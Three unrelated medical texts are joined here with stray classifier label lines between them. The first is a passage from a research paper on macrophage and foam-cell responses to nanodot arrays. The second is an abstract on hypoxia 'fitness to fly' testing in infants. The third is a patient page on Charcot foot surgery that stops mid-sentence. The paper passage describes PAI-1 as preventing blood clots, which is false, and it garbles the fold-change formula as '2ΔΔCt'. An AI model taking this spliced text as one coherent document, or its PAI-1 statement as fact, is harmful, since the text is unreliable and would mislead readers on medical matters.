Monolayers of foam cells prepared on nanodot surface were fixed with 10% formaldehyde in phosphate-buffered saline (PBS) (pH 7.4) for 10 min at room temperature, then stained with Oil Red O, and counterstained with hematoxylin for 10 min[22]. Fabrication and characterization of nanodot arrays Nanodot arrays were fabricated by anode aluminum oxide processing as described previously[21]. A tantalum nitride (TaN) thin film of 150-nm thickness was sputtered onto a 6-in. silicon wafer followed by deposition of a 3-μm-thick aluminum onto the top of a TaN layer. Anodization was carried out in 1.8 M sulfuric acid at 5 V for the 10-nm nanodot array or in 0.3 M oxalic acid at 25, 60, and 100 V for 50-, 100-, and 200-nm nanodot arrays, respectively. Porous anodic alumina was formed during the anodic oxidation. The underlying TaN layer was oxidized into tantalum oxide nanodots using the alumina nanopores as a template. The porous alumina was removed by immersing in 5% (w/v) H3PO4 overnight. The dot diameters were 15 ± 2.8-nm, 58.1 ± 5.6-nm, 95.4 ± 9.2-nm, and 211.5 ± 30.6-nm for the 10-, 50-, 100-, and 200-nm dot arrays. The average heights were 11.3 ± 2.5-nm, 51.3 ± 5.5-nm, 101.1 ± 10.3-nm, and 154.2 ± 27.8-nm, respectively. Dot-to-dot distances were 22.8 ± 4.6-nm, 61.3 ± 6.4-nm, 108.1 ± 2.3-nm, and 194.2 ± 15.1-nm, respectively. The dimension and homogeneity of nanodot arrays were measured and calculated from images taken using a JEOL JSM-6500 TFE-SEM (JEOL Ltd., Akishima, Tokyo, Japan). The cell viability assay Cells were harvested and fixed with 4% formaldehyde in PBS for 30 min followed by PBS wash for three times. The membrane was permeated by incubating in 0.1% Triton X-100 for 10 min, followed by PBS wash for three times. The sample was incubated with 4′,6-diamidino-2-phenylindole (DAPI) and phalloidin for 15 min at room temperature. The samples were mounted and imaged using a Leica TSC SP2 confocal microscope (Leica Microsystems Ltd., Milton Keynes, UK). The number of viable cells was counted using ImageJ software (National Institutes of Health, Bethesda, MA, USA) and expressed in terms of cell density. Scanning electron microscopy The harvested cells were fixed with 1% glutaraldehyde in PBS at 4°C for 20 min, followed by post-fixation in 1% osmium tetroxide for 30 min. Dehydration was performed through a series of ethanol concentrations (10-min incubation each in 50%, 60%, 70%, 80%, 90%, 95%, and 100% ethanol) and air-dried. The specimen was sputter-coated with platinum and examined using a JEOL JSM-6500 TFE-SEM at an accelerating voltage of 5 keV. Immunostaining Cells were harvested and fixed with 4% paraformaldehyde in PBS for 15 min followed by PBS wash for three times. Cell membrane was permeated by incubating in 0.1% Triton X-100 for 10 min, followed by PBS wash for three times, and blocked by 1% bovine serum albumin (BSA) in PBS for 1 h and PBS wash for three times. The sample was incubated with anti-vinculin antibody (properly diluted in 1% BSA) and phalloidin for 1 h, followed by incubation with Alexa Fluor 488 goat anti-mouse antibody for 1 h, and then followed by PBS wash for three times. Samples were mounted and imaged by using a Leica TSC SP2 confocal microscope. Quantitative real-time RT-PCR Total RNA was extracted from macrophages and foam cells using TRI-reagent (Talron Biotech, Rehovot, Israel) according to the manufacturer’s specifications. The RNA was isolated using chloroform extraction and isopropanol precipitation. The crude RNA extract was immediately purified with an RNeasy Mini Kit (Qiagen, Venlo, Netherlands) to remove impurities and unwanted organics. Purified RNA was resuspended in DEPC water and quantified by OD260. The OD260 to OD280 ratio usually exceeded 2.0 at this stage. For cDNA synthesis, 1 μg of total RNA was annealed with 1 μg of oligo-dT primer, followed by reverse transcription using Super Script® III Reverse Transcriptase (Invitrogen, Carlsbad, CA, USA) in a total volume of 50 μl. Between 0.2 and 0.5 μl of the reverse transcription reactions was used for quantitative polymerase chain reaction (qPCR) using SYBR Green I on an iCycler iQ5 (Bio-Rad Laboratories, Hercules, CA, USA). Cycling conditions were as follows: 1× (5 min at 95°C) and 50× (20 s at 95°C, 20 s at 55°C, and 40 s at 72°C). Fluorescence was measured after each 72°C step. Expression levels were obtained as threshold cycles (Ct), which were determined by the iCycler iQ Detection System software (Bio-Rad Laboratories, Hercules, CA, USA). Relative transcript quantities were calculated using the ΔΔCt method. Glyceraldehydes-3-phosphate dehydrogenase (GAPDH) was used as a reference gene and was amplified from the same cDNA samples. Due to the difference in threshold cycles of the sample mRNA relative to the GAPDH, mRNA was defined as ΔCt. The difference between the ΔCt of the untreated control and the ΔCt of the SMF-treated sample was defined as ΔΔCt. The fold change in mRNA expression was expressed as 2ΔΔCt. The results were expressed as the mean ± standard deviation (SD) of six experiments. Results and discussion Nanotopography-modulated morphology and cell spread of macrophages and foam cells To characterize how the macrophages and foam cells interact with the aforementioned nanodot arrays, the cells were cultured for 72 h on nanodot arrays of different diameters including flat substrate as a control. The morphological appearance of adhered cells was imaged by both optical image microscopy and scanning electron microscopy (SEM) (Figures1 and2). Macrophages and foam cells grown on the flat surface and 10-nm nanodot arrays exhibited flat and extended conformation during the course of 3 days. Cells grown on the 50-nm nanodot arrays showed more extended morphology than those on the flat surface with apparently larger surface area for each cell. Cells grown on the 100-nm nanodot arrays exhibited a distorted morphology with shrinking surface area and increased length of lamellipodia. Apoptosis-like appearance and reduction in surface area with extended lamellipodia were seen with cells seeded on the 200-nm nanodot arrays. Figure 1 Macrophage and foam cell morphology changes with topographical surface. Macrophages and foam cells were grown on flat, 10-, 50-, 100-, and 200-nm nanodot arrays for 3 days, stained with Oil Red O, and counter stained by hematoxylin (the arrows in foam cells indicate engulfed lipoproteins). Morphology was imaged by optical microscopy. Scale bar = 50 μm. Figure 2 Morphology of macrophages cultured on nanodot arrays. Macrophages were grown on flat, 10-, 50-, 100-, and 200-nm nanodot arrays for 3 days, and their morphology was imaged by scanning electron microscopy. Scale bar for low-mag = 10 μm and for high-mag = 1 μm. Formation of focal adhesions reflected by the attachment of filopodia and lamellipodia to the substratum indicates healthy growth for cultured cells. SEM images showed that the lamellar body of migrating cells, seeded on 50-nm nanodot arrays, exhibited wide and thick characters with a large number of filopodia (Figure2). Cells seeded on flat and 10-nm nanodot arrays showed comparable lamellipodia. However, the cells seeded on 100- and 200-nm nanodot arrays were mounted with extended length and narrow-size lamellipodia. Figure3a shows the correlation between cell spread area and dot size for macrophages and foam cells . Cell surface area representing the percent adhesion area of viable cells relative to cells cultured on a flat surface was calculated and plotted against the nanodot diameter. Based on quantitative analysis, the cell spread area of macrophages increased significantly between 21.6% and 37.9% with increasing dot sizes of 10- to 50-nm, respectively. Interestingly, as dot diameter increased from 100- to 200-nm, there was a significant reduction in cell surface area of 22.7% and 43.2%, respectively. A similar biphasic trend, increasing cell surface area from 10- to 50-nm and decreasing from 100- to 200-nm, was observed with foam cells. This trend of change correlated with qualitative analysis as shown in Figure1. Although the precise reason for such differential growth pattern is not known, since increasing the dot diameter above 100-nm stimulates an apoptosis-like growth and a significant reduction in the surface area, these results demonstrate that nanodot arrays larger than 100-nm are less biocompatible to cells. Figure 3 Nanotopography-dependent cell spreading area, focal adhesion, and cell density. Macrophages and foam cells seeded on nanodot arrays of various sizes were harvested after a 3-day culture. (a) Cell spread area versus dot diameter for cells cultured on the nanodot arrays. The viable cells were counted, and the percent adhesion area relative to cells cultured on a flat surface was calculated and plotted against the nanodot diameter. (b) Focal adhesions (amount of vinculin staining) versus dot diameters for cells cultured on nanodot arrays. The amount of vinculin staining per cell was measured, and the percentage of focal adhesion relative to cells cultured on a flat surface was calculated and plotted against the nanodot diameter. (c) Cell density versus dot diameter for cells cultured on the nanodot arrays. The viable cells were counted, and percent viability relative to cells cultured on a flat surface was calculated and plotted against the nanodot diameter. The mean ± SD from at least three experiments is shown. Asterisk denotes p < 0.005 when compared to the flat control surface. Nanotopography-modulated cell adhesion and cytoskeleton organization of macrophages and foam cells To evaluate cell adhesion and cytoskeleton reorganization, immunostaining specific to vinculin and actin filaments was performed on nanodot arrays (Figure4). The amount of vinculin staining in foam cells was significantly less than that in macrophages for all nanodot sizes. Foam cells had fewer focal adhesion molecules than macrophages when grown on nanodot arrays and might have the destiny of apoptosis. Vinculin staining was well distributed for macrophages grown on the flat surface and on the 10- to 100-nm nanodot arrays, with the highest density of vinculin for cells grown on 50-nm nanodot arrays. Nevertheless, the amount of vinculin staining decreased for cells grown on 200-nm nanodot arrays (Figure4). For foam cells, vinculin staining had the same trend as that for macrophages: increasing from flat to 50-nm nanodot arrays, becoming gradually lost for cells grown on 100-nm nanodot arrays, and completely disappearing for 200-nm nanodot arrays. Figure 4 Immunostaining showing distribution of vinculin (green) and actin filaments (red) in macrophages and foam cells. Macrophages and foam cells were seeded on flat, 10-, 50-, 100-, and 200-nm nanodot arrays for 3 days, and their morphology was observed by confocal microscopy. Scale bar = 25 μm. Immunostaining of actin filaments indicated a well-organized cytoskeleton in macrophages grown on flat, 10-, and 50-nm nanodot arrays, but it is gradually lost for 100-nm nanodot arrays and has completely disappeared for 200-nm nanodot arrays. For foam cells, cytoskeleton arrangement had the same trend as macrophages: increasing from flat to 50-nm nanodot arrays, becoming gradually lost for cells grown on 100-nm nanodot arrays, and completely disappearing for 200-nm nanodot arrays. Immunostaining indicated that nanodot arrays in the range of 10- to 100-nm promoted cell adhesion and cytoskeleton organization for macrophages and foam cells (Figure3b). Best adhesion occurred at 50-nm nanodots, whereas nanodots of 200-nm retarded the formation of focal adhesions and inhibited the organization of the cytoskeleton. Nanotopography-modulated cell density To evaluate the viability of macrophages and foam cells on varied nanodot arrays, cells were seeded on nanodot arrays, ranging from 10- to 200-nm including flat control. Macrophages and foam cells were cultured for 72 h, and then, DAPI staining was performed to verify viable cells on each nanodot array and flat surface (Figure3c). For macrophages, compared to the flat surface, there were 10.6%, 149.1%, and 26.5% increases in the number of viable cells for 10-, 50-, and 100-nm nanodot arrays, respectively, but 41.2% reduction was observed on 200-nm nanodot arrays. For foam cells, a 110% increase in the number of viable cells was observed for 50-nm nanodot arrays, and 28.6% reduction occurred for 200-nm nanodot arrays. Effect of nanotopography on the expression of genes related to inflammation and circulatory repair The cytokine gene expression profiles related to inflammation of macrophages and foam cells cultured on nanodot arrays were measured at 72 h, using qPCR. The cytokines examined were TNF-α, IL-6, IL-10, CCL-2, and CCL-3 (Figure5a,b). In addition, genes important for the development of the circulatory system and repair were also evaluated (Figure5c,d): PAI-1, VEGF, and PECAM. Figure 5 Changes in cytokine and chemokine gene expression profiles. (a) Macrophages and (b) foam cells were cultured on nanodot arrays of different sizes for 72 h, and qPCR was conducted to evaluate gene expression of TNF-α, IL-6, CCL-3, IL-10, and CCL-2. Gene expression profiles for genes were involved in circulatory repair. (c) Macrophages and (d) foam cells were cultured on nanodot arrays of different sizes for 72 h, and qPCR was conducted to evaluate gene expression of PAI-1, VEGF and PECAM. TNF-α is a pro-inflammatory cytokine and is responsible for activation and positive regulation of the NFκB pathway, which is a key regulator of the immune response[23]. There was a five-fold increase in TNF-α found at 50-nm nanodot arrays in macrophages, while a five- to six-fold increase was demonstrated in foam cells at 50- to 100-nm nanodot arrays (Figure5a,b). Similarly, IL-6 encodes a pro-inflammatory cytokine that is critical for activating an acute inflammatory response and is responsible for recruiting adaptive immune cells to the site of injury or infection. There was a significant three-fold increase of IL-6 in macrophages cultured on 200-nm nanodot arrays, while there was about a one-fold increase at 50- to 100-nm nanodot arrays. In contrast, the foam cells responded differently than the macrophages, with a three- to five-fold increase of IL-6 when cultured on 10- to 100-nm nanodot arrays and a two-fold increase for 200-nm nanodot arrays. In comparison, IL-10 is an anti-inflammatory cytokine responsible for blocking the synthesis of pro-inflammatory cytokines and negatively regulates NFκB activation. There was an increasing trend of IL-10 gene expression in the macrophages and the foam cells (Figure5a,b). For the CCL-2 chemokine, which functions to recruit monocytes and other immune cells, there was no significant change in any of the macrophage topography conditions. However, in foam cells, there was a 2.5-fold increase at 200-nm nanodot arrays, while there was less than one-fold increase at 10- to 100-nm nanodot arrays (Figure5b). Another common chemokine is CCL-3. This protein is responsible for recruiting and activating leukocytes to aid in an immune response. Figure5a showed less than 1% increase in CCL-3 in macrophages at 10- to 200-nm nanodot arrays, while a six-fold increase at 200-nm nanodot arrays in foam cells was observed (Figure5b). In addition to the immune response, genes associated with circulatory repair were also investigated. PAI-1 is a gene involved in the prevention of blood clots. There was a five-fold increase in PAI-1 observed at 200-nm nanodot arrays in macrophages (Figure5c), whereas foam cells displayed an inconsistent pattern of increase of PAI-1 (Figure5d). Furthermore, VEGF is known to play a key role in the creation of new blood vessels during development as well as repair during injury. There was an inconsistent increase in VEGF for the macrophages, while foam cells demonstrated a significant increase at the 50-nm topography (Figure5d). PECAM is responsible for removing old neutrophils from the site of injury and preventing buildup of immune cell debris. In the macrophages, there was no change in PECAM genes; however, the foam cells displayed significant increases for the 50- to 200-nm topographies. In summary, the differences in relative gene expressions shown here are topography induced and normalized to flat surface. When evaluating the gene expression trends observed in the macrophages, there was a highly significant increase in TNF-α expression for the 50-nm topography. For all of the topographies, there was limited impact on the expression of CCL-3 and CCL-2, whereas, there was a mild elevation in IL-6 expression. Taken together, there was a limited induction of an inflammatory response for these topographies. The expression of PAI-1, VEGF, and PECAM were also evaluated, and there were low levels of expression for all genes in all topographies except for the 200-nm topography, which displayed significant increases in PAI-1 expression. Since PAI-1 helps to prevent blood clots and the buildup of cells, in conjunction with data from the gene expression studies where limited immune responses were observed, the 200-nm topography might assist in the prevention of foam cell formation. When evaluating the foam cells directly, there were high levels of the early-response pro-inflammatory cytokines IL-6 and TNF-α for the 50- and 100-nm topographies with mild increases in expression for the 10- and 200-nm topographies. Furthermore, the 200-nm topography demonstrated high levels of expression for the pro-inflammatory cytokine CCL-3. In addition, when the circulatory repair genes were assessed, the 100-nm topography demonstrated a significant increase in the PECAM gene which functions to remove leukocyte debris from cells. Since foam cells are derived from macrophages that are not cleared from the system, this 100-nm topography could greatly aid in the prevention or removal of foam cells from the body. After 72 h, macrophages showed an increase in inflammatory gene expression on 10- and 200-nm nanodot arrays, while the difference was not significant compared to the flat. Foam cells showed the most inflammatory gene expression on 200-nm nanodot arrays. The common acute inflammation gene expression of CCL-3 responded significantly to the topography of 100- and 200-nm nanodot arrays for foam cells. However, the macrophages showed the most acute inflammation on the 10-nm nanodot arrays. Thus, the topographical effect on the PAI-1 gene expression was difficult to discern. Recently, it has been shown that three-dimensional surface topography (size, shape, and surface texture) is one of the most important parameters that influence cellular reactions[24, 25]. Other studies have demonstrated that the difference in cellular response correlates with a modulation of the concentration of serum proteins on the surface[26, 27]. Many studies have shown that cell biomaterial interactions can activate macrophages which results in the synthesis of pro-inflammatory agents such as TNFα, IFNγ, IL-1, and IL-6[28, 29] Most likely, the surface properties, such as material surface chemistry and topography, can modulate the expression of pro-inflammatory cytokines and chemokines by macrophages in a time-dependent manner[30]. Although many studies have investigated cellular reaction to different surface patterns, the behavior of immune cells, such as macrophages and foam cells, cultured on different diameters of nanodots has not been studied thoroughly. Our study suggests that topography may modulate the phenotypes of macrophages and foam cells in the context of foreign body response. The response to topography in the form of nanodot arrays in the range of 10- to 200-nm has revealed a distinctive pattern, and topography indeed affects cell morphology, density, adhesion, and cytokine expression compared to flat controls. The changes in cell morphology are observed in four different sizes of nanodot arrays, indicating that the findings in this study are topography-mediated. Using topography-induced change in macrophages and foam cell behavior, it is possible to influence phenotypic response, such as cell activation, motility, and maturation in the foreign body response. While there is a mild induction of the inflammatory response for the 100- and 200-nm topographies, these growth conditions also supported expressions of genes that would be responsible in the prevention of foam cell formation and the removal of foam cells, suggesting potential benefits. Furthermore, it might be possible to treat the cells with antioxidants or other anti-inflammatory mediators to prevent the inflammatory response while benefiting from the increase in PAI-1 and PECAM. Conclusion We have shown topologic modulation of cell growth, cell density, cell spreading area, and immune functions. Our results demonstrated that 50-nm nanodots displayed a biocompatible surface compared to 100- and 200-nm nanodots in terms of macrophage and foam cell growth. In addition, based on qPCR data, 100- and 200-nm surface-induced inflammatory gene expression in macrophages and foam cells suggest that nanostructured materials (100- and 200-nm) trigger the immune inflammatory stress response. The role of topography in modulating implant tissue reaction would require further elucidation. This study suggests that nanotopography may be beneficial for the design of cardiovascular implants. Authors’ information MM and HAP are doctoral degree students at the Department of Material Science and Engineering, National Chiao Tung University. GSH is a professor at the Department of Material Science and Engineering, National Chiao Tung University. YCH is a professor at the Department of Obstetrics and Gynecology, China Medical University and Hospital and also professor at the College of Medicine, China Medical University. Declarations Acknowledgment This study was supported in part by the National Science Counsel Grant 100-2923-B-009-001-MY3 and by the ‘Aim for the Top University Plan of the National Chiao’ Tung University and Ministry of Education, Taiwan, R.O.C. Authors’ Affiliations (1) Department of Material Science and Engineering, National Chiao Tung University (2) Section of Gynecologic Oncology, Department of Obstetrics and Gynecology, China Medical University and Hospital (3) College of Medicine, China Medical University References 1. Hosseinkhani H, Hosseinkhani M, Hattori S, Matsuoka R, Kawaguchi N: Micro and nano-scale in vitro 3D culture system for cardiac stem cells. J Biomed Mater Res A 2010, 94A: 1–8.View ArticleGoogle Scholar 2. Kriparamanan R, Aswath P, Zhou A, Tang L, Nguyen KT: Nanotopography: cellular responses to nanostructured materials. J Nanosci Nanotechnol 2006, 6: 1905–1919.View ArticleGoogle Scholar 3. Latysh V, Krallics G, Alexandrov I, Fodor A: Application of bulk nanostructured materials in medicine. Curr Appl Phys 2006, 6: 262–266.View ArticleGoogle Scholar 4. Wood MA: Colloidal lithography and current fabrication techniques producing in-plane nanotopography for biological applications. J R Soc Interface 2007, 4: 1–17.View ArticleGoogle Scholar 5. Buxton DB: Current status of nanotechnology approaches for cardiovascular disease: a personal perspective. Wiley Interdiscip Rev Nanomed Nanobiotechnol 2009, 1: 149–155.View ArticleGoogle Scholar 6. Hussain SM, Braydich-Stolle LK, Schrand AM, Murdock RC, Yu KO, Mattie DM, Schlager JJ, Terrones M: Toxicity evaluation for safe use of nanomaterials: recent achievements and technical challenges. Adv Mater 2009, 21: 1549–1559.View ArticleGoogle Scholar 7. Hussain SM, Schlager JJ: Safety evaluation of silver nanoparticles: inhalation model for chronic exposure. Toxicol Sci 2009, 108: 223–224.View ArticleGoogle Scholar 8. Schaeublin NM, Braydich-Stolle LK, Schrand AM, Miller JM, Hutchison J, Schlager JJ, Hussain SM: Surface charge of gold nanoparticles mediates mechanism of toxicity. Nanoscale 2011, 3: 410–420.View ArticleGoogle Scholar 9. Kruth HS: Macrophage foam cells and atherosclerosis. Front Biosci 2001, 6: D429-D455.View ArticleGoogle Scholar 10. Lucas AD, Greaves DR: Atherosclerosis: role of chemokines and macrophages. Expert Rev Mol Med 2001, 3: 1–18.View ArticleGoogle Scholar 11. Persson J, Nilsson J, Lindholm MW: Cytokine response to lipoprotein lipid loading in human monocyte-derived macrophages. Lipids Health Dis 2006, 5: 17.View ArticleGoogle Scholar 12. Zhao DS, Ma GF, Selenius M, Salo J, Pikkarainen T, Konttinen YT: Ectopic expression of macrophage scavenger receptor MARCO in synovial membrane-like interface tissue in aseptic loosening of total hip replacement implants. J Biomed Mater Res A 2010, 92A: 641–649.Google Scholar 13. Baker BM, Nathan AS, Gee AO, Mauck RL: The influence of an aligned nanofibrous topography on human mesenchymal stem cell fibrochondrogenesis. Biomaterials 2010, 31: 6190–6200.View ArticleGoogle Scholar 14. Elias KL, Price RL, Webster TJ: Enhanced functions of osteoblasts on nanometer diameter carbon fibers. Biomaterials 2002, 23: 3279–3287.View ArticleGoogle Scholar 15. Lobo AO, Antunes EF, Palma MB, Pacheco-Soares C, Trava-Airoldi VJ, Corat EJ: Monolayer formation of human osteoblastic cells on vertically aligned multiwalled carbon nanotube scaffolds. Cell Biol Int 2010, 34: 393–398.View ArticleGoogle Scholar 16. Zanello LP, Zhao B, Hu H, Haddon RC: Bone cell proliferation on carbon nanotubes. Nano Lett 2006, 6: 562–567.View ArticleGoogle Scholar 17. Pan HA, Hung YC, Su CW, Tai SM, Chen CH, Ko FH, Steve Huang G: A nanodot array modulates cell adhesion and induces an apoptosis-like abnormality in NIH-3T3 cells. Nanoscale Res Lett 2009, 4: 903–912.View ArticleGoogle Scholar 18. Schindler M, Ahmed I, Kamal J, Nur EKA, Grafe TH, Young Chung H, Meiners S: A synthetic nanofibrillar matrix promotes in vivo-like organization and morphogenesis for cells in culture. Biomaterials 2005, 26: 5624–5631.View ArticleGoogle Scholar 19. Ahmed I, Liu HY, Mamiya PC, Ponery AS, Babu AN, Weik T, Schindler M, Meiners S: Three-dimensional nanofibrillar surfaces covalently modified with tenascin-C-derived peptides enhance neuronal growth in vitro. J Biomed Mater Res A 2006, 76: 851–860.View ArticleGoogle Scholar 20. Pan HA, Hung YC, Sui YP, Huang GS: Topographic control of the growth and function of cardiomyoblast H9c2 cells using nanodot arrays. Biomaterials 2012, 33: 20–28.View ArticleGoogle Scholar 21. Wu CT, Ko FH, Hwang HY: Self-aligned tantalum oxide nanodot arrays through anodic alumina template. Microelectron Eng 2006, 83: 1567–1570.View ArticleGoogle Scholar 22. Schwartz CJ, Ghidoni JJ, Kelley JL, Sprague EA, Valente AJ, Suenram CA: Evolution of foam cells in subcutaneous rabbit carrageenan granulomas: I. Light-microscopic and ultrastructural study. Am J Pathol 1985, 118: 134–150.Google Scholar 23. Baldwin AS Jr: The NF-kappa B and I kappa B proteins: new discoveries and insights. Annu Rev Immunol 1996, 14: 649–683.View ArticleGoogle Scholar 24. Anselme K, Bigerelle M: Topography effects of pure titanium substrates on human osteoblast long-term adhesion. Acta Biomater 2005, 1: 211–222.View ArticleGoogle Scholar 25. Bigerelle M, Anselme K, Dufresne E, Hardouin P, Iost A: An unscaled parameter to measure the order of surfaces: a new surface elaboration to increase cells adhesion. Biomol Eng 2002, 19: 79–83.View ArticleGoogle Scholar 26. Curtis A, Wilkinson C: Nantotechniques and approaches in biotechnology. Trends Biotechnol 2001, 19: 97–101.View ArticleGoogle Scholar 27. Scotchford CA, Ball M, Winkelmann M, Voros J, Csucs C, Brunette DM, Danuser G, Textor M: Chemically patterned, metal-oxide-based surfaces produced by photolithographic techniques for studying protein- and cell-interactions. II: protein adsorption and early cell interactions. Biomaterials 2003, 24: 1147–1158.View ArticleGoogle Scholar 28. Huang J, Best SM, Bonfield W, Brooks RA, Rushton N, Jayasinghe SN, Edirisinghe MJ: In vitro assessment of the biological response to nano-sized hydroxyapatite. J Mater Sci Mater Med 2004, 15: 441–445.View ArticleGoogle Scholar 29. Peters K, Unger RE, Kirkpatrick CJ, Gatti AM, Monari E: Effects of nano-scaled particles on endothelial cell function in vitro: studies on viability, proliferation and inflammation. J Mater Sci Mater Med 2004, 15: 321–325.View ArticleGoogle Scholar 30. Refai AK, Textor M, Brunette DM, Waterfield JD: Effect of titanium surface topography on macrophage activation and secretion of proinflammatory cytokines and chemokines. J Biomed Mater Res A 2004, 70: 194–205.View ArticleGoogle Scholar Copyright © Mohiuddin et al.; licensee Springer. 2012 This article is published under license to BioMed Central Ltd. This is an Open Access article distributed under the terms of the Creative Commons Attribution License (http://creativecommons.org/licenses/by/2.0), which permits unrestricted use, distribution, and reproduction in any medium, provided the original work is properly cited.
__label__pos
0.609429
Article Text Download PDFPDF Fitness to fly testing in term and ex-preterm babies without bronchopulmonary dysplasia 1. C J Bossley1, 2. D Cramer1, 3. B Mason2, 4. A Hayward3, 5. J Smyth4, 6. A McKee1, 7. R Biddulph3, 8. E Ogundipe3, 9. A Jaffé2, 10. I M Balfour-Lynn1,4 1. 1Royal Brompton Hospital, London, UK 2. 2Department of Paediatric Respiratory Medicine, Sydney Children's Hospital, Sydney, New South Wales, Australia 3. 3Department of Neonatal Medicine, Royal Hospital for Women, Sydney, New South Wales, Australia 4. 4Department of Neonatal Medicine, Chelsea & Westminster Hospital, London, UK 1. Correspondence to Dr I M Balfour-Lynn, Department of Paediatric Respiratory Medicine, Royal Brompton & Harefield NHS Foundation Trust, Sydney Street, London SW3 6NP, UK; i.balfourlynn{at}ic.ac.uk Abstract Background During air flight, cabin pressurisation produces an effective fraction of inspired oxygen (FiO2) of 0.15. This can cause hypoxia in predisposed individuals, including infants with bronchopulmonary dysplasia (BPD), but the effect on ex-preterm babies without BPD was uncertain. The consequences of feeding a baby during the hypoxia challenge were also unknown. Methods Ex-preterm (without BPD) and term infants had fitness to fly tests (including a period of feeding) at 3 or 6 months corrected gestational age (CGA) in a body plethysmograph with an FiO2 of 0.15 for 20 min. A ‘failed’ test was defined as oxygen saturation (SpO2) <90% for at least 2 min. Results 41 term and 30 ex-preterm babies (mean gestational age 39.8 and 33.1 weeks, respectively) exhibited a significant median drop in SpO2 (median −6%, p<0.0001); there was no difference between term versus ex-preterm babies, or 3 versus 6 months. Two term (5%) and two ex-preterm (7%) babies failed the challenge. The SpO2 dropped further during feeding (median −4% in term and −2% in ex-preterm, p<0.0001), with transient desaturation (up to 30 s) <90% seen in 8/36 (22%) term and 9/28 (32%) ex-preterm infants; the ex-preterm babies desaturated more quickly (median 1 vs 3 min, p=0.002). Conclusions Ex-preterm babies without BPD and who are at least 3 months CGA do not appear to be a particularly at-risk group for air travel, and routine preflight testing is not indicated. Feeding babies in an FiO2 of 0.15 leads to a further fall in SpO2, which is significant but transient. Statistics from Altmetric.com Request Permissions If you wish to reuse any or all of this article please use the link below which will take you to the Copyright Clearance Center’s RightsLink service. You will be able to get a quick price and instant permission to reuse the content in many different ways. Footnotes • Correction notice This article has been corrected since it was published Online First. The authors have requested that AH be added as the fourth author to this paper. • Competing interests None. • Patient consent Obtained. • Ethics approval This study was conducted with the approval of the Brompton, Harefield & National Heart Lung Institute Research Ethics Committee South Eastern Sydney and Illawarrah Human Research Ethics Committee – Northern Hospital Network Sector. • Provenance and peer review Not commissioned; externally peer reviewed.
__label__pos
0.972547
Our Services Common Disorders Surgical Management of Diabetic Charcot Foot The Charcot foot is a non-infective, destructive type of arthritis that affects between 1-2.5% of diabetics. The incidence of this arthritic process has increased recently due to patients with diabetes mellitus living longer. There is an equal distribution among males and females. The average age of patients developing a Charcot foot is 40 years. 30% of patients develop a Charcot foot in both feet and/or ankles. This form of arthritis can develop suddenly and without pain. In a very short period of time the bones in the foot and/or ankle can spontaneously fracture and fragment. The final result in the development of a diabetic Charcot foot is severe foot deformity. These deformities may result in difficulty wearing standard footgear. As the deformity progresses the foot takes on the appearance of a "rocker bottom". As the arch of the foot collapses areas of pressure develop on the bottom of the foot that are prone to developing open sores or ulcerations. Loss of ankle stability may occur to such an extent that the patient may not be able to walk without the use of a brace. The vast majority of these deformities can be treated with non-operative care. New advances in technology and the development of new forms of lower extremity braces and splints have provided a wider range of treatment alternatives that are very effective in managing the Charcot foot. There are situations where non-operative therapy is ineffective in managing a Charcot foot. Surgical management of the Charcot foot may be required to resolve some of the problems associated with the condition. Indications for surgery include: 1) chronic deformity with significant instability that is not amenable to brace treatment, 2) chronic deformity with increased plantar pressures and risk of ulceration, 3) a significant deformity with secondary ulceration that has failed to heal despite non-operative therapy and 4) recurrent ulcers that have initially healed with non-operative care. Surgical Intervention Various types of surgery are available and may be required to manage a Charcot foot. The type of surgery that may be necessary depends on 1) the anatomic location of the Charcot deformity (i.e. the midfoot, the ankle. etc.) 2) the stage of the Charcot process (there are three specific stages of the Charcot process) 3) whether or not an ulcer is present. 4) whether or not the deformity is unstable and 5) overall health status of the patient. The types of surgical procedures include the following: 1. Ostectomy - Ostectomy is a surgical procedure where a portion of bone is removed from the bottom of the foot. This procedure is usually performed for a wound on the bottom of the foot that is secondary to pressure from a bony prominence. An ulcer may or may not be present. The goal of the surgery is to remove the bone causing increased pressure and thereby allowing the ulcer to resolve or prevent the area from ulcerating. This procedure is usually performed as an outpatient or may require a one-night stay in the hospital. The type of anesthesia selected depends upon the health status of the patient and the preference of the surgeon. Recovery time includes 3-4 weeks in a weight-bearing brace or cast. A patient can usually return to extra depth footgear with a diabetic insert following complete healing. 2. Midfoot Realignment Arthrodesis - This procedure is usually indicated when there is significant instability of the middle portion of the foot. Usually the foot has collapsed and there is significant bony prominence along the bottom of the foot. Surgery is indicated when a simple ostectomy will not be sufficient. The goal of surgery is to provide stability and a relatively normal arch to the foot. This procedure usually requires a one or two night stay in the hospital. This is usually performed under general anesthesia and requires various types of internal fixation to be placed within the foot. This may include screws and plates. The convalescence associated with midfoot realignment arthrodesis is approximately three months in a non-weight-bearing cast. A patient may then progress to a weight-bearing brace for approximately 1-2 months. The patient will then return to an extra depth shoe with a diabetic insert at 5-6 months following surgery. 3. Hindfoot and Ankle Realignment Arthrodesis - Hindfoot and ankle realignment arthrodesis is usually indicated when there is significant instability resulting in a patient being unable to walk. These types of procedures are recommended when bracing has failed. Patients are basically non-ambulatory and many times amputation of the limb is the only other alternative. Realignment arthrodesis of the hindfoot and ankle is a limb salvage surgery. The ultimate goals of the procedure are to maintain a functional limb such that one can transfer within their home and possibly do some walking with the use of a brace or ambulatory assistive device. This procedure usually requires a 1-2 night stay in the hospital. The procedure is performed under general anesthesia and requires the use of various types of internal and external fixation devices. This may include the use of screws, plates, intramedullary nails and external fixators. The postoperative course includes approximately four months in a non-weight-bearing cast followed by a 2-3 month period of walking in a protective rocker bottom brace. A patient will then progress to a custom made brace that may be required throughout the course of their lifetime. Possible Complications Surgery in the diabetic patient always has significant risks. People with diabetes mellitus are more susceptible to infection due to their disease process. Therefore, these operations have a high complication rate. The arthrodesis procedures have a greater failure rate, increased risk of complications and longer convalescence relative to simple procedures such as ostectomy. It is recommended that a patient and their family have an extensive consultation with the surgeon to understand all potential risks including limb loss. A patient must be medically fit since this does require a general inhalation anesthesia and an extensive postoperative course. Preoperative work-up should include assessment of cardiac status and must be performed prior to surgical intervention. Summary Surgical management of the Charcot foot can be challenging and at times risky, but often the only alternative for limb-salvage. Many of the patients who undergo this type of surgery would otherwise go on to a below-the-knee amputation. Therefore, surgical management of the Charcot foot can be quite gratifying to the patient, the patient's family and the surgeon. The patient and the family should thoroughly understand the risks and benefits of the procedure and have an extensive preoperative consultation with the surgeon. It is recommended that surgery be performed by an experienced practitioner who has a thorough understanding of the disease process and experience with this type of surgery. It may be advantageous to have this type of surgery performed at a tertiary care facility to handle the potential complications that one might incur with these types 